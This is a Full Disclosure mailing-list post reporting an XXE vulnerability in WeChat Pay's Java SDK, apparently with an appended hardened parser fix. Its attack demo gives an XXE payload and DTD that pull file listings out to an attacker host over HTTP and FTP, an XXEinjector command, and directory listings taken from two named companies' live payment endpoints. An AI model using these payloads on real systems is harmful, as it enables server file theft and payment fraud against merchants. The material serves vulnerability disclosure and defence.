Message-ID: <CALtHGqBewmUUF9j0vtFuntAbn9Bnq=_bn5gdMszmy4uxa2-Thw@mail.gmail.com>
Date: Mon, 2 Jul 2018 16:31:26 -0700
From: Rose Jackcode <1024rosecode@...il.com>
To: fulldisclosure@...lists.org
Subject: Re: [FD] XXE in WeChat Pay Sdk ( WeChat leave a backdoor on merchant websites)
Sorry, there is something to fix:
it lost the "?" character.
It should be fixed to:
https://pay.weixin.qq.com/wiki/doc/api/app/app.php?chapter=11_1
2018-07-01 8:57 GMT-07:00 Rose Jackcode <1024rosecode@...il.com>:
> Hi List,
>
>
> [Title]
>
>
> XXE in WeChat Pay Sdk ( WeChat leave a backdoor on merchant websites)
>
>
> ------------------------------------------
>
>
> [Background]
>
> “Mobile payments surge to $9 trillion a year, changing how people shop,
> borrow—even panhandle”, as WSJ.com once reported. As a payment security
> researcher, I occasionally found a perilous problem about WeChat Pay
> which I think may be easy to make use of. Therefore, I hope to be able
> to contact WeChat Pay quickly.
>
>
> ------------------------------------------
>
>
> [Description]
>
> When using WeChat Pay, merchants need to provide a notification URL
> to accept asynchronous payment results. Unfortunately, WeChat
> unintentionally provides an XXE vulnerability in the Java version of the SDK
> which handles this result. The attacker can build a malicious payload towards
> the notification URL to steal any information from the merchant server he or
> she wants. Once the attacker gets the crucial security key (md5-key and
> merchant-Id etc.) of the merchant, he can even buy anything without
> paying by just sending forged info to deceive the merchants.
>
> WeChat can fix it by updating the SDK quite easily; however, the bad side
> is that exposed merchants may need a long time to do so, for the sake of
> time, cost and skills needed.
>
>
> ------------------------------------------
>
>
> [Authors]
>
>
> 1024fresher
>
> ------------------------------------------
>
>
> [Detail]
>
>
> The SDK in this page: https://pay.weixin.qq.com/wiki/doc/api/jsapi.php chapter=11_1
>
> Just the Java version: https://pay.weixin.qq.com/wiki/doc/api/download/WxPayAPI_JAVA_v3.zip
>
> or https://drive.google.com/file/d/1AoxfkxD7Kokl0uqILaqTnGAXSUR1o6ud/view ( Backup )
>
>
>
>
>
> README.md in WxPayApi_JAVA_v3.zip shows more details:
>
>
>
> notify code example:
>
> [
>
> String notifyData = "...."; // raw XML body of the notification POST
> MyConfig config = new MyConfig();
> WXPay wxpay = new WXPay(config);
>
> // convert to map (this call parses the untrusted XML)
> Map<String, String> notifyMap = WXPayUtil.xmlToMap(notifyData);
>
> if (wxpay.isPayResultNotifySignatureValid(notifyMap)) {
>     // do business logic
> } else {
>     // signature invalid: reject the notification
> }
>
> ]
>
> WXPayUtil source code
>
> [
>
> import java.io.ByteArrayInputStream;
> import java.io.InputStream;
> import java.util.HashMap;
> import java.util.Map;
> import javax.xml.parsers.DocumentBuilder;
> import javax.xml.parsers.DocumentBuilderFactory;
> import org.w3c.dom.Node;
> import org.w3c.dom.NodeList;
>
> public static Map<String, String> xmlToMap(String strXML) throws Exception {
>     try {
>         Map<String, String> data = new HashMap<String, String>();
>
>         /*** not disabled xxe *****/
>         // start parse: default factory, DOCTYPE and external entities are allowed
>         DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance();
>         DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder();
>         InputStream stream = new ByteArrayInputStream(strXML.getBytes("UTF-8"));
>         org.w3c.dom.Document doc = documentBuilder.parse(stream);
>         // end parse
>
>         doc.getDocumentElement().normalize();
>         NodeList nodeList = doc.getDocumentElement().getChildNodes();
>         for (int idx = 0; idx < nodeList.getLength(); ++idx) {
>             Node node = nodeList.item(idx);
>             if (node.getNodeType() == Node.ELEMENT_NODE) {
>                 org.w3c.dom.Element element = (org.w3c.dom.Element) node;
>                 data.put(element.getNodeName(), element.getTextContent());
>             }
>         }
>         try {
>             stream.close();
>         } catch (Exception ex) {
>             // do nothing
>         }
>         return data;
>     } catch (Exception ex) {
>         WXPayUtil.getLogger().warn("Invalid XML, can not convert to map. Error message: {}. XML content: {}", ex.getMessage(), strXML);
>         throw ex;
>     }
> }
>
> ]
>
>
>
>
>
>
>
>
> ------------------------------------------
>
>
> [Attack demo]
>
> Post merchant notification url with payload:
>
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE root [
> <!ENTITY % attack SYSTEM "file:///etc/">
> <!ENTITY % xxe SYSTEM "http://attacker:8080/shell/data.dtd">
> %xxe;
> ]>
>
> data.dtd:
>
> <!ENTITY % shell "<!ENTITY % upload SYSTEM 'ftp://attack:33/%attack;'>">
> %shell;
> %upload;
>
> or use the XXEinjector tool (https://github.com/enjoiz/XXEinjector)
>
> ruby XXEinjector.rb --host=attacker --path=/etc --file=req.txt --ssl
>
> req.txt :
>
> POST merchant_notification_url HTTP/1.1
> Host: merchant_notification_url_host
> User-Agent: curl/7.43.0
> Accept: */*
> Content-Length: 57
> Content-Type: application/x-www-form-urlencoded
>
> XXEINJECT
>
>
> In order to prove this, I got 2 famous Chinese companies:
>
> a. momo: a well-known chat tool like WeChat
>
> b. vivo: China's famous mobile phone, which is also famous in my country
>
>
> Example momo:
>
> attack:
> notify url: https://pay.immomo.com/weixin/notify
> cmd: /home/
>
> result:
> ***
> logs
> zhang.jiax**
> zhang.shaol**
> zhang.xia**
> ****
>
> attack:
> notify url: https://pay.immomo.com/weixin/notify
> cmd: /home/logs
>
> result:
> ***
> moa-service
> momotrace
> ****
>
>
> Example vivo:
>
> attack:
> notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo
> cmd: /home/
>
> result:
> tomcat
>
> attack:
> notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo
> cmd: /home/tomcat
>
> result:
> .bash_logout
> .bash_profile
> .bashrc
> logs
>
> attack:
> notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo
> cmd: /home/tomcat/logs
>
> result:
> ****
> tomcat-2018-06-28.log
> tomcat-2018-06-29.log
> tomcat-2018-06-30.log
> *****
>
> ------------------------------------------
>
>
> [Reference]
>
>
> https://www.youtube.com/watch?v=BZOg_NgvP18
>
> https://www.blackhat.com/docs/us-15/materials/us-15-Wang-FileCry-The-New-Age-Of-XXE-java-wp.pdf
>
>
>
> Regards,
>
>
> 1024rosecode
>
>
>
>
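The root cause in the quoted WXPayUtil.xmlToMap() is a DocumentBuilderFactory left at its defaults, which resolves DOCTYPE declarations and external entities. The following is an added example of a hardened drop-in replacement with the same map-building contract; it is not code from the WeChat Pay SDK or from the poster. The class name SafeXmlToMap, the sample notification body and the field values are constructed for this example. Because a WeChat Pay notification is a flat XML document that never legitimately carries a DOCTYPE, the parser is configured to reject any DOCTYPE outright, with the entity and DTD features switched off as defence in depth.

```java
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import java.util.Map;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import org.xml.sax.SAXParseException;

/**
 * Hardened replacement for the SDK's xmlToMap() (added example, not SDK code).
 * Behaviour for real notification bodies is unchanged: child elements of the
 * root element become map entries. Documents carrying a DOCTYPE are rejected.
 */
public final class SafeXmlToMap {

    // One hardened factory for the process; DocumentBuilder instances are cheap to create from it.
    private static final DocumentBuilderFactory FACTORY = newHardenedFactory();

    private static DocumentBuilderFactory newHardenedFactory() {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        try {
            // Primary control: any <!DOCTYPE ...> makes parse() throw a SAXParseException,
            // so neither inline nor external entity declarations are ever processed.
            f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            // Defence in depth, in case the DOCTYPE rule is ever relaxed.
            f.setFeature("http://xml.org/sax/features/external-general-entities", false);
            f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
            f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        } catch (ParserConfigurationException e) {
            // Fail closed: do not fall back to a parser that cannot be hardened.
            throw new IllegalStateException("XML parser lacks required security features", e);
        }
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    /** Same contract as WXPayUtil.xmlToMap: child elements of the root become map entries. */
    public static Map<String, String> xmlToMap(String strXML) throws Exception {
        Map<String, String> data = new HashMap<>();
        DocumentBuilder builder = FACTORY.newDocumentBuilder();
        try (InputStream stream = new ByteArrayInputStream(strXML.getBytes(StandardCharsets.UTF_8))) {
            Document doc = builder.parse(stream);
            doc.getDocumentElement().normalize();
            NodeList nodeList = doc.getDocumentElement().getChildNodes();
            for (int idx = 0; idx < nodeList.getLength(); ++idx) {
                Node node = nodeList.item(idx);
                if (node.getNodeType() == Node.ELEMENT_NODE) {
                    Element element = (Element) node;
                    data.put(element.getNodeName(), element.getTextContent());
                }
            }
        }
        return data;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample of a benign notification body; values are made up for this example.
        String benign = "<xml><return_code><![CDATA[SUCCESS]]></return_code>"
                + "<out_trade_no><![CDATA[ORDER-0001]]></out_trade_no>"
                + "<total_fee>1</total_fee></xml>";
        System.out.println("benign -> " + xmlToMap(benign));

        // Constructed body carrying a DOCTYPE, the precondition for any XXE payload.
        String withDoctype = "<?xml version=\"1.0\"?><!DOCTYPE xml [<!ENTITY e \"x\">]><xml><a>&e;</a></xml>";
        try {
            xmlToMap(withDoctype);
            System.out.println("UNEXPECTED: DOCTYPE was accepted");
        } catch (SAXParseException e) {
            // Expected: the hardened parser refuses the document before resolving anything.
            System.out.println("rejected DOCTYPE: " + e.getMessage());
        }
    }
}
```

The hardened factory is the change a merchant needs even if the vendor SDK is updated later: a quick check of a deployed copy is to search the SDK sources for the string disallow-doctype-decl; if it is absent from WXPayUtil, the notification endpoint still parses untrusted XML with a default parser. Note that the original code also logs the full XML content on parse failure, so rejected payloads will appear in the merchant's application logs, which is useful for detection but means those logs should be treated as containing attacker-controlled input.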
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/